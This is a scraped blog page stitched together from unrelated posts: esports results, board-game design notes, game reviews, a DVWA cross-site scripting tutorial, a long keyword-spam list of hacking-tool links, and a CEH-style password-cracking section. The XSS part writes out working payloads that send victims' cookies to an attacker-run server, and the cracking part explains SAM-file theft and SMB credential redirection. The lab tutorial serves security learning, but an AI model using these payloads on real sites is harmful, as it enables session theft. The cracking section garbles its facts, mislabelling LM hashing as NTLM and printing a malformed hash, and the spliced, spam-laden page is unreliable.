Make 'em

IP

Tuesday, 22 September 2020

Results Of North West Online Provincial Championships Held On 29 August 2020

Anneke Lourens (Hoërskool Klerksdorp) won the female division for Clash Royale.

With MSSA's 2020 National Team Trials looming ever nearer (19 September 2020), Registered Players are furiously attempting to qualify for such Trials. Those who have already qualified are using the last few championships to perfect their craft.

Thus, MSSA's 2020 North West Online Provincial Championships held on 29 August 2020 proved to be the perfect vehicle for those who are still yet to qualify, and for those who are ironing out any of the kinks that they may have.

Even though the championship is designed to cater for athletes from the North West, Mind Sports South Africa's Board agreed to allow anyone to enter in the championship in order to fully enable all Registered Players every opportunity in qualifying for Trials.

Registered Players from around the country entered, and a good time has had by all.

All Registered Players who have finished in the first three places of the Premier division are eligible for National Team Trials as long as they have at least one other championship in which they have qualified. Those that have only qualified once, have another opportunity to qualify in the form of MSSA's Free State Online Provincial Championships to be held on 5 September 2020.

The list of winners of MSSA's North West Online Provincial Championships are as follows:

TitleName of player/teamClubColours awarded
Clash Royale - PremierWillie van RensburgHoërskool KlerksdorpNorth West Provincial Colours
Clash Royale - FemaleAnneke LourensHoërskool KlerksdorpNorth West Provincial Colours
Clash Royale - High SchoolNico BisschoffHoërskool Klerksdorp
DotA 2 - PremierZAG DOTAZAG AcademyProvincial Colours*
PES - PremierRafeeq CariemPES SOCIETYWestern Cape Provincial Colours
PES - High SchoolGeorge De AbreuCurro Klerksdorp
Street Fighter V- PremierTheunis van der MerweHoërskool KlerksdorpNorth West Provincial Colours
Tekken 7Mhlengi NkosiNWU - VaalGauteng Provincial Colours

*denotes a team in which players represented more than one province. 

Also read:

Saturday, 12 September 2020

Recent Playtesting: Apotheosis (FKA Worker Learning)


Apotheosis

Since I last posted about it, I've had the opportunity to play Apotheosis (the current title for my Worker Learning game) about a dozen times. We've quickly iterated on a couple of different aspects, going from 8 starting workers (one level 1 and one level 2 of each type) to 4 (one of each type, some level 1, some level 2, depending on turn order), adding a space to recruit more workers (I'm torn on this), adding a space to pay a chunk of resources for steps on the victory tracks, and tweaking the resolution of the Recall turns and the requirements and rewards for adventures.

The current version looks something like this:

You start with a Fighter, a Cleric, a Mage, and a Thief, 0/1/2/2 of them are level 2 at the beginning if you are player 1/2/3/4 (the ones that start leveled up are dealt to you randomly, and no two players will have the same combination of upgraded starting workers).

You take turns either placing a worker and gaining the benefit of that space (your worker must be at least tied for the highest level in that area), or recalling your workers and sending them on an adventure. Most spaces are better if you are higher level, or the right class. You can gain resources, train (level up), claim adventures (so nobody can do them out from under you), buy progress on the victory tracks, turn resources into blessings, which are like wild resources, visit the Throne Room to earn royal favors, or visit the tavern to recruit more workers.

When you place a worker, you have the opportunity to play a Side Quest card for either of 2 effects (one cares about what type of worker you are placing that turn, the other doesn't). When you recall workers, you earn steps on the three victory tracks, and if you qualify, you may do an adventure to earn more steps. The adventures have 3 tiers, and the higher the tier you do, the better the rewards. After returning from an adventure, your workers level up, becoming better at their jobs.

When you do certain Side Quests, or tier 3 adventures, you get a special resource called Spoils. You can visit the throne room to turn those Spoils into Royal Favors, which you can use at certain points on the victory tracks to take a "shortcut" as well as earn a Boon (reusable power card).

Design concerns


I'm noticing a real tightness in the design -- a difficulty creating adventures that are both doable by a player who has not recruited any new workers, but also doable by a player who has. The current level cap is 6, and so I wanted the adventures to require max 6 levels of any one class. If you hire a worker, then place it, and recall once, then you have 2 workers who's levels total 4 or 5 -- that's almost maxed out already! I am considering making the level cap 8 instead of 6, but d6s are easier to use in the prototype. Doing so would allow for more variety and more texture in the adventure requirements. It's also possible that not every adventure needs to be doable without recruiting another worker.

With just 4 types of worker, many of the tier 2 adventures require 3 of the 4 types. So you basically need to train up all of your workers if you wan to use them at all, there's not really such a things as choosing a class and neglecting it. I'm considering adding a 5th worker type to help with this -- it would allow the adventure requirements to be much more diverse.

Another thought is to add Split and/or Prestige classes:
Split classes would be like regular workers, that count as either one or the other of two types (like a Fighter/Thief would count as either a Fighter or a Thief.
Prestige classes would be like super workers that count as BOTH of two different types (Paladin = Fighter AND Cleric). For these you would probably have to discard your previous worker, therefore they BECOME a dual class worker.

Brainstorming possible solutions


Split/Prestige class workers would be pretty cool. but that sounds like expansion content to me. However adding a 5th (maybe even a 6th?) class to make the adventures more different from each other sounds reasonable. But that idea comes with its own challenges...

In the current game, each worker type is associated with 1 resource, and 3 of them are associated with one of the victory tracks. When you recall a fighter, you advance on the Crown Imperial track, and adventures that require fighters advance you further on that track. Thieves are associated with the Prince of Thieves track, and Mages are associated with the Mastermind track. Clerics are great supporting characters -- they aren't associated with any particular track, but instead give you Blessings, which are sort of like a wild resource that can be used in various different ways.

So if another worker type is added, do we need another resource? That might be a pain, but would be doable. Another victory track? I don't necessarily think that's a good idea (though I suppose it could work). What is another iconic adventurer class anyway?

One possibility is to make this 5th class a sort of Split/Prestige class like I mentioned above. Like a Paladin, which could act as either (or both) of a fighter or a cleric. But that would simply overload the fighter related stuff. So maybe better if whatever the new class is, it doesn't advance any of the tracks, but is otherwise "better" than a normal worker (counts as all types when placing?). Or perhaps it advances the track of your choice, and has some other drawback (doesn't count as any type when placing?).

As for the level caps, one way to fix that situation is to not use dice as workers (even though it's super convenient for prototypes). Instead, perhaps a mini or standee, with a base that has a little pointer, then a dial could be attached to the bottom such that the pointer points to the number on the tile corresponding to the current level. This is a user friendly way to not have to use dice, and therefore not be as limited in their value. The level cap could easily be 8, or even 9!

Another, different possible solution to the over-leveling issue is to limit the level-ups to only 1 per recall turn. This would slow things down considerably, and it would probably matter quite a bit which one you choose to gain levels and which ones you don't. It might also make a much bigger difference between playing 1-2 workers then recalling vs playing 3 or 4 before recalling. I'd be afraid this is TOO slow, but it ought to be easy enough to test. If it works, then that would make a level cap of 6 potentially viable after all.

Resident Evil 3 Review (PS4)

Written by Alexander O. Cuaycong and Anthony L. Cuaycong


Title: Resident Evil 3
Developer: CAPCOM Co., Ltd.
Publisher: CAPCOM Co., Ltd.
Genre: Action
Price: $59.99
Also Available On: Steam, XB1



Capcom has been on a roll of late, with such notables as Monster Hunter World and Devil May Cry 5 proving to be critical and commercial hits. And with last year's Resident Evil 2 remake likewise making waves, not a few quarters have justifiably looked to Resident Evil 3's release with heightened expectations. While technically a remake of Resident Evil 3: Nemesis, the direction the Osaka-based publisher, along with creative partners K2, Redworks, and M-Two, took through its three years in development all but made it a new game. Most notably, crucial elements from its source material were removed, and designs of the characters and settings reimagined, to promote its pronounced bias for action




In Resident Evil 3, players take control of Jill Valentine, one of the few members of the STARS team who survived the Spencer mansion incident in the Arklay Mountains. Its premise is the same as the original: She's stalked by a killing machine designed to hunt her down and silence her, and she must use her wits, her training, and what weapons she has at her disposal to stay alive in Raccoon City. In practice, it plays similarly as well: She has access to the same arsenal, and she's able to traverse the same locations. And for all the attention it pays to action in combat, it thankfully retains the oppressive atmosphere fans of the survival horror franchise have come to consider as standard.

Indeed, zombies still stalk the streets, and the series' more dangerous creatures — from the skittering Drain Deimos to the notorious Hunters — lie just out of sight. Resident Evil 3 likewise retains the dodge-roll function, Nemesis' constant interference in Jill's plans, and even the Carlos segments. At first glance, Capcom has seemingly both made a faithful remake and updated facets for the contemporary crowd. Which does make the whole experience worthwhile. It's visually stunning, thematically engaging, and technically impressive. And, by all accounts, it ticks off the requisite boxes of a game veterans of, and newcomers to, the genre will enjoy.




That said, players who remember the original may have some qualms about the changes Resident Evil 3 makes. For example, the Carlos portions are much longer in nature and duration. Meanwhile, others in the original — among them the graveyard and the clock tower segments — have been reduced or cut out entirely; in their places are old locations that have been expanded. Another notable change: The Gravedigger boss in the graveyard portion has been excised, and a completely new boss, with a unique set of gimmicks, has been put in its place.

The changes aside, Resident Evil 3 has a few glaring problems, most specifically in regard to its length and replay value. The first run figures to take upwards of seven hours to complete, but successive play-throughs will be shorter. While not a problem in and of itself, it becomes cause for concern given the absence of "The Mercenaries — Operation: Mad Jackal," the much-lauded mini-game in original. True, it tries to fill the gap by having two extra difficulty settings in Nightmare and Inferno. Then again, they succeed in little more than ramp up the challenge; they do little in encouraging players to finish the game more than a few times. Which, all things considered, may leave those who enjoy extra modes and extra content wanting for more.




Still, Resident Evil 3 is worth playing through. It may not be as good a remake as Resident Evil 2, but it nonetheless pulls its weight as a worthy update to a highly regarded title.



THE GOOD
  • A grounded and interesting take on Jill Valentine
  • Graphically impressive while still playing smoothly
  • Able to consistently provide tension and dread even as it ramps up the stakes
  • Additional difficulty settings (with two of four initially locked until completion)

THE BAD
  • Missing "The Mercenaries — Operation: Mad Jackal" mode
  • Changes sequences from the original, making it feel more like a reimagining than a remake


RATING: 9/10

Thursday, 3 September 2020

Into The Tiny

Tiny Epic Galaxies delivers on its promise: it has the feel of an epic exploration game, but it comes in a small box and doesn't take all day to play. Now, don't get me wrong, it isn't Xia or Star Wars Rebellion, but it still creates a sense of mighty space empires growing stronger as they explore and conquer new territory.

It's a dice placement game, a growing sub-genre of worker placement where players roll dice to determine what actions they can do in a given round. The actions here are moving a space ship between planets, acquiring one of the game's two resources (energy or culture), using either diplomacy or economy to advance colonization efforts on a planet, or utilizing an established colony's special ability for a game effect.

Players start with 4 dice and two space ships, and compete to exploit the resources of a row of planet cards at the center of the table. Landing on a planet conveys a one-time use of that planet's special ability. Orbiting the planet and taking the time to colonize it takes longer but adds the planet to your pool of colonies, meaning only you may use its special ability. Additionally, each planet provides either energy or culture, so spreading out your ships to take the best advantage of the acquire resource action is critical to having the resources you need to upgrade your empire, which gets you more ships and dice to use on later turns.

As with all the games in the Tiny Epic series, this one doesn't really offer anything truly original, but that's not the point. The accomplishment is that it offers something similar to what you normally only get from much larger and more time-consuming games. The amount of game that designer Scott Almes is able to get out of a minimum of components is astonishing.

Rating: 4 (out of 5) There's a lot more going on in this game than can be expected from a 5" x 7" box, that's for sure.

Sunday, 30 August 2020

Learning Web Pentesting With DVWA Part 4: XSS (Cross Site Scripting)

In this article we are going to solve the Cross-Site Scripting Attack (XSS) challenges of DVWA app. Lets start by understanding what XSS attacks are. OWASP defines XSS as: "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page."
XSS attacks are usually used to steal user cookies which let attackers control the victim's account or to deface a website. The severity of this attack depends on what type of account is compromised by the attacker. If it is a normal user account, the impact may not be that much but if it is an admin account it could lead to compromise of the whole app or even the servers.

DOM, Sources, and Sinks:

DVWA has three types of XSS challenges. We'll describe them as we go through them in this article. But before we go about to solve these challenges we need to understand few things about a browser. We need to know what Document Object Model (DOM) is and what are sources & sinks. DOM is used by browsers as a hierarchical representation of elements in the webpage. Wikipedia defines DOM as "a cross-platform and language-independent interface that treats an XML or HTML document as a tree structure wherein each node is an object representing a part of the document. The DOM represents a document with a logical tree". A source can be described simply as input that a user supplies. And a sink can be defined as "potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it". Javascript function eval() is an example of a sink.

DOM Based XSS:

Now lets solve our first XSS challenge which is a DOM based XSS challenge. DOM based XSS occurs when sources are passed to sinks without proper validation. An attacker passes specifically crafted input to the sink to cause undesirable effects to the web app.
"Fundamentally, DOM-based vulnerabilities arise when a website passes data from a source to a sink, which then handles the data in an unsafe way in the context of the client's session."
On the DVWA app click on XSS (DOM), you will be presented with a page like this:
Keep an eye over the URL of the page. Now select a language and click the Select button. The URL should look like this now:
http://localhost:9000/vulnerabilities/xss_d/?default=English
We are making a GET request to the server and sending a default parameter with the language that we select. This default parameter is the source and the server is passing this source to the sink directly without any validation. Now lets try to exploit this vulnerability by changing the URL to this:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>alert(XSS)</script>
When we hit enter after modifying the URL in the URL bar of the browser we should see an alert box popup with XSS written on it. This proves that the app is passing the data from source to sink without any validation now its time that we steal some cookies. Open another terminal or tab and setup a simple http server using python3 like this:
python3 -m http.server
By default the python http server runs on port 8000. Now lets modify the URL to steal the session cookies:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>new Image().src="http://localhost:8000/?c="+document.cookie;</script>
The payload we have used here is from the github repository Payload all the things. It is an awesome repository of payloads. In this script, we define a new image whose source will be our python http server and we are appending user cookies to this request with the help of document.cookie javascript function. As can be seen in the image we get a request from the page as soon as the page loads with our xss payload and can see user cookies being passed with the request. That's it we have stolen the user cookies.

Reflected XSS:

Another type of XSS attack is called Reflected XSS Attack. OWASP describes Reflected XSS as those attacks "where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request."
To perform this type of attack, click on XSS (Reflected) navigation link in DVWA. After you open the web page you are presented with an input field that asks you to input your name.
Now just type your name and click on submit button. You'll see a response from server which contains the input that you provided. This response from the server which contains the user input is called reflection. What if we submit some javascript code in the input field lets try this out:
<script>alert("XSS")</script>
After typing the above javascript code in the input field click submit. As soon as you hit submit you'll see a pop-up on the webpage which has XSS written on it. In order to steal some cookies you know what to do. Lets use another payload from payload all the things. Enter the code below in the input field and click submit:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Here we are using img html tag and its onerror attribute to load our request. Since image x is not present on the sever it will run onerror javascipt function which performs a GET request to our python http server with user cookies. Like we did before.
Referencing OWASP again, it is mentioned that "Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS."
Obviously you'll need your super awesome social engineering skills to successfully execute this type of attack. But yeah we are good guys why would we do so?

Stored XSS:

The last type of XSS attack that we are going to see is Stored XSS Attack. OWASP describes Stored XSS attacks as those attacks "where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS."
To perform this type of XSS attack, click on XSS (Stored) navigation link in DVWA. As the page loads, we see a Guestbook Signing form.
In this form we have to provide our name and message. This information (name and message) is being stored in a database. Lets go for a test spin. Type your name and some message in the input fields and then click Sign Guestbook. You should see your name and message reflected down below the form. Now what makes stored XSS different from reflected XSS is that the information is stored in the database and hence will persist. When you performed a reflected XSS attack, the information you provided in the input field faded away and wasn't stored anywhere but during that request. In a stored XSS however our information is stored in the database and we can see it every time we visit the particular page. If you navigate to some other page and then navigate back to the XSS (Stored) page you'll see that your name and message is still there, it isn't gone. Now lets try to submit some javascript in the message box. Enter a name in the name input field and enter this script in the message box:
<script>alert(XSS)</script>
When we click on the Sign Guestbook button, we get a XSS alert message.
Now when you try to write your cookie stealing payload you notice you cannot put your payload in the box as the maximum input length for the textarea is set to 50. To get rid of this restriction, right-click on the textarea box and click inspect. Change or delete the maxlength="50" attribute in code:
<textarea name="mtxMessage" cols="50" rows="3" maxlength="50"></textarea>
to something like this:
<textarea name="mtxMessage" cols="50" rows="3"></textarea>
And now use your payload to steal some cookies:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Everytime a user visits this page you'll get his/her cookies (Sweet...). You don't need to send any links or try your super powerful social engineering skills to get user cookies. Your script is there in the database it will be loaded everytime a user visits this vulnerable page.
This is it for today see you next time.

References:

  1. DOM-based vulnerabilities: https://portswigger.net/web-security/dom-based
  2. DOM-based XSS: https://portswigger.net/web-security/cross-site-scripting/dom-based
  3. Document Object Model: https://en.wikipedia.org/wiki/Document_Object_Model
  4. Payload All the Things: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
  5. Cross Site Scripting (XSS): https://owasp.org/www-community/attacks/xss/

Read more


  1. Hacker Techniques Tools And Incident Handling
  2. Hack Tools For Games
  3. Pentest Tools Kali Linux
  4. Hack Tools Pc
  5. Top Pentest Tools
  6. Hacking Tools For Windows
  7. Hacking Tools For Windows 7
  8. World No 1 Hacker Software
  9. Pentest Recon Tools
  10. Pentest Recon Tools
  11. Hack Tools
  12. Underground Hacker Sites
  13. Pentest Reporting Tools
  14. Hacking Tools Windows 10
  15. Hacker Tools Hardware
  16. Pentest Tools
  17. Hacker Tools 2019
  18. Pentest Tools Review
  19. Hacker Search Tools
  20. Hacker Tools Github
  21. How To Install Pentest Tools In Ubuntu
  22. Hacker Techniques Tools And Incident Handling
  23. Android Hack Tools Github
  24. Hack Apps
  25. Pentest Tools List
  26. How To Hack
  27. Hacking Tools For Beginners
  28. New Hacker Tools
  29. Nsa Hacker Tools
  30. Pentest Tools Port Scanner
  31. Hack And Tools
  32. Kik Hack Tools
  33. Hacker Tools Hardware
  34. Underground Hacker Sites
  35. Nsa Hack Tools
  36. Pentest Tools For Android
  37. Hacker Tools For Windows
  38. Hacking Tools Kit
  39. Hacking Tools Github
  40. Hackrf Tools
  41. Black Hat Hacker Tools
  42. Kik Hack Tools
  43. Hack Tools 2019
  44. Pentest Tools Review
  45. Hacker Tools Windows
  46. Hacker Security Tools
  47. Hacker Hardware Tools
  48. Hacking Tools 2019
  49. Game Hacking
  50. How To Make Hacking Tools
  51. Hacker Tools Apk Download
  52. Hack Rom Tools
  53. Hacking Tools For Windows
  54. World No 1 Hacker Software
  55. Hacker Tools Linux
  56. Install Pentest Tools Ubuntu
  57. Pentest Tools For Windows
  58. Pentest Tools For Android
  59. Hack Tool Apk
  60. Hack Tools Mac
  61. Hacker Techniques Tools And Incident Handling
  62. Hacking Tools Kit
  63. Pentest Tools Github
  64. Pentest Tools Apk
  65. Pentest Tools Online
  66. Pentest Tools Framework
  67. Hacker Tools 2019
  68. Hacker Tools For Windows
  69. Hacking Tools For Kali Linux
  70. Pentest Tools For Windows
  71. Hacking Tools Kit
  72. Hacker Tools Linux
  73. Hak5 Tools
  74. Pentest Tools Online
  75. Nsa Hack Tools Download
  76. Hacking Tools For Pc
  77. Hack Tools Online
  78. Hacker Tools For Mac
  79. Pentest Tools Android
  80. Tools For Hacker
  81. Hack Tools For Ubuntu
  82. Underground Hacker Sites
  83. How To Make Hacking Tools
  84. Hacker Hardware Tools
  85. Pentest Tools Alternative
  86. Hacking Tools
  87. Best Hacking Tools 2020
  88. Hacker Tools
  89. Hacking Tools
  90. Hacking Tools 2020
  91. Pentest Tools For Windows
  92. Hack Tools For Mac
  93. Ethical Hacker Tools
  94. Hacking Tools For Windows
  95. Hacking Tools For Kali Linux
  96. Hacker Techniques Tools And Incident Handling
  97. Hak5 Tools
  98. Pentest Tools Framework
  99. Hack Tools For Ubuntu
  100. Pentest Tools Kali Linux
  101. Hacking Tools Windows 10
  102. Free Pentest Tools For Windows
  103. Pentest Reporting Tools
  104. Hacking Tools Github
  105. World No 1 Hacker Software
  106. Beginner Hacker Tools
  107. Hacking Tools 2020
  108. World No 1 Hacker Software
  109. Hacking Tools Name
  110. Tools Used For Hacking
  111. Best Pentesting Tools 2018
  112. Hacker Tools Hardware
  113. Pentest Tools Linux
  114. Hack Tools For Mac
  115. Hack Tools 2019
  116. Hacker Security Tools
  117. Hacker Tool Kit
  118. Ethical Hacker Tools
  119. Hack And Tools
  120. Hacker Tools Free
  121. Pentest Tools Alternative
  122. Hacking Tools Usb
  123. Hack Tools For Windows
  124. Hacker Tools For Windows
  125. Wifi Hacker Tools For Windows
  126. Hacker Tools Github
  127. Easy Hack Tools
  128. Hack Tools
  129. Tools 4 Hack
  130. Pentest Tools Linux

CEH: System Hacking, Cracking A Password, Understanding The LAN Manager Hash, NetBIOS DoS Attacks


Passwords are the key element of information require to access the system. Similarly, the first step is to access the system is that you should know how to crack the password of the target system. There is a fact that users selects passwords that are easy to guess. Once a password is guessed or cracked, it can be the launching point for escalating privileges, executing applications, hiding files, and covering tracks. If guessing a password fails, then passwords may be cracked manually or with automated tools such as a dictionary or brute-force method.

Cracking a Password

Passwords are stored in the Security Accounts Manager (SAM) file on a Windows system and in a password shadow file on a Linux system.

Manual password cracking involves attempting to log on with different passwords. The hacker follows these steps:
  1. Find a valid user account (such as Administrator or Guest).
  2. Create a list of possible passwords.
  3. Rank the passwords from high to low probability.
  4. Key in each password.
  5. Try again until a successful password is found.
A hacker can also create a script file that tries each password in a list. This is still considered manual cracking, but it's time consuming and not usually effective.

A more efficient way of cracking a password is to gain access to the password file on a system. Most systems hash (one-way encrypt) a password for storage on a system. During the logon process, the password entered by the user is hashed using the same algorithm and then compared to the hashed passwords stored in the file. A hacker can attempt to gain access to the hashing algorithm stored on the server instead of trying to guess or otherwise identify the password. If the hacker is successful, they can decrypt the passwords stored on the server.

Understanding the LAN Manager Hash

Windows 2000 uses NT LAN Manager (NTLM) hashing to secure passwords in transit on the network. Depending on the password, NTLM hashing can be weak and easy to break. For example, let's say that the password is 123456abcdef . When this password is encrypted with the NTLM algorithm, it's first converted to all uppercase: 123456ABCDEF . The password is padded with null (blank) characters to make it 14 characters long: 123456ABCDEF__ . Before the password is encrypted, the 14-character string is split in half: 123456A and
BCDEF__ . Each string is individually encrypted, and the results are concatenated:

123456A = 6BF11E04AFAB197F
BCDEF__ = F1E9FFDCC75575B15

The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15 .

Cracking Windows 2000 Passwords

The SAM file in Windows contains the usernames and hashed passwords. It's located in the Windows\system32\config directory. The file is locked when the operating system is running so that a hacker can't attempt to copy the file while the machine is booted to Windows.

One option for copying the SAM file is to boot to an alternate operating system such as DOS or Linux with a boot CD. Alternately, the file can be copied from the repair directory. If a system administrator uses the RDISK feature of Windows to back up the system, then a compressed copy of the SAM file called SAM._ is created in C:\windows\repair . To expand this file, use the following command at the command prompt:

C:\>expand sam._ sam

After the file is uncompressed, a dictionary, hybrid, or brute-force attack can be run against the SAM file using a tool like L0phtCrack. A similar tool to L0phtcrack is Ophcrack.

Download and install ophcrack from http://ophcrack.sourceforge.net/

Redirecting the SMB Logon to the Attacker

Another way to discover passwords on a network is to redirect the Server Message Block (SMB) logon to an attacker's computer so that the passwords are sent to the hacker. In order to do this, the hacker must sniff the NTLM responses from the authentication server and trick the victim into attempting Windows authentication with the attacker's computer.

A common technique is to send the victim an email message with an embedded link to a fraudulent SMB server. When the link is clicked, the user unwittingly sends their credentials over the network.

SMBRelay

An SMB server that captures usernames and password hashes from incoming
SMB traffic. SMBRelay can also perform man-in-the-middle (MITM) attacks.

SMBRelay2

Similar to SMBRelay but uses NetBIOS names instead of IP addresses to capture usernames and passwords.

pwdump2

A program that extracts the password hashes from a SAM file on a Windows system. The extracted password hashes can then be run through L0phtCrack to break the passwords.

Samdump

Another program that extracts NTLM hashed passwords from a SAM file.

C2MYAZZ

A spyware program that makes Windows clients send their passwords as clear text. It displays usernames and their passwords as users attach to server resources.

NetBIOS DoS Attacks

A NetBIOS denial-of-service (DoS) attack sends a NetBIOS Name Release message to the NetBIOS Name Service on a target Windows systems and forces the system to place its name in conflict so that the name can no longer be used. This essentially blocks the client from participating in the NetBIOS network and creates a network DoS for that system.
  1. Start with a memorable phrase, such as "Maryhadalittlelamb"
  2. Change every other character to uppercase, resulting in "MaRyHaDaLiTtLeLaMb"
  3. Change a to @ and i to 1 to yield "M@RyH@D@L1TtLeL@Mb"
  4. Drop every other pair to result in a secure repeatable password or "M@H@L1LeMb"

Now you have a password that meets all the requirements, yet can be "remade" if necessary.

Related articles